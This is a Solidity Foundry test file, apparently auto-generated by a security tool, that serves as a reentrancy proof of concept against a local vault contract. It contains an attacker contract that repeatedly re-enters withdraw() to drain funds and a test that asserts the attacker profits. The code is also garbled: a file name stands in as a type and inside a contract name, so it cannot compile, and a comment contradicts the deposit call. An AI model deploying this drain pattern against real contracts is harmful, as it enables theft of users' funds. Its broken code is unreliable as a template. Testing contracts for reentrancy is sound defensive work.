// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #2 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      reentrancy_vault.sol
 * FUNCTION:      
 * VULNERABILITY: REENTRANCY
 * SEVERITY:      HIGH
 * CONFIDENCE:    50.0%
 * VERDICT:       External call before state update
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-11 03:59
 */

import "../../reentrancy_vault.sol";

/// @notice Attacker contract that exploits reentrancy in reentrancy_vault.sol.withdraw
contract ReentrancyAttacker {
    reentrancy_vault.sol public target;
    uint256 public attackCount;
    uint256 public attackAmount;

    constructor(address _target) {
        target = reentrancy_vault.sol(payable(_target));
    }

    function attack() external payable {
        attackAmount = msg.value;
        // Step 1: Deposit to become a valid user
        // No payable deposit found -- manual setup may be needed
        // Step 2: Trigger the vulnerable function
        target.withdraw();
    }

    // Step 3: Re-enter on ETH receive
    receive() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.withdraw();
        }
    }

    fallback() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.withdraw();
        }
    }
}

contract PoC_Reentrancy_reentrancy_vault.sol_Test is Test {
    reentrancy_vault.sol public vulnerable;
    ReentrancyAttacker public attacker;

    function setUp() public {
        // Deploy the REAL vulnerable contract
        vulnerable = new reentrancy_vault.sol();
        attacker = new ReentrancyAttacker(address(vulnerable));

        // Fund the contract with victim deposits
        address victim = makeAddr("victim");
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vulnerable.deposit{value: 10 ether}();
    }

    function test_reentrancy_exploit() public {
        console.log("=== AGL PoC: Reentrancy in reentrancy_vault.sol.withdraw ===");

        uint256 contractBefore = address(vulnerable).balance;
        console.log("Contract balance before:", contractBefore / 1e18, "ETH");

        // Execute reentrancy attack with 1 ETH
        vm.deal(address(attacker), 1 ether);
        attacker.attack{value: 1 ether}();

        uint256 contractAfter = address(vulnerable).balance;
        uint256 attackerBalance = address(attacker).balance;
        console.log("Contract balance after:", contractAfter / 1e18, "ETH");
        console.log("Attacker profit:", attackerBalance / 1e18, "ETH");

        // The attacker should have more than their initial 1 ETH
        assertGt(attackerBalance, 1 ether, "Reentrancy exploit: attacker should profit");
        console.log("[CONFIRMED] Reentrancy vulnerability exploited!");
    }
}
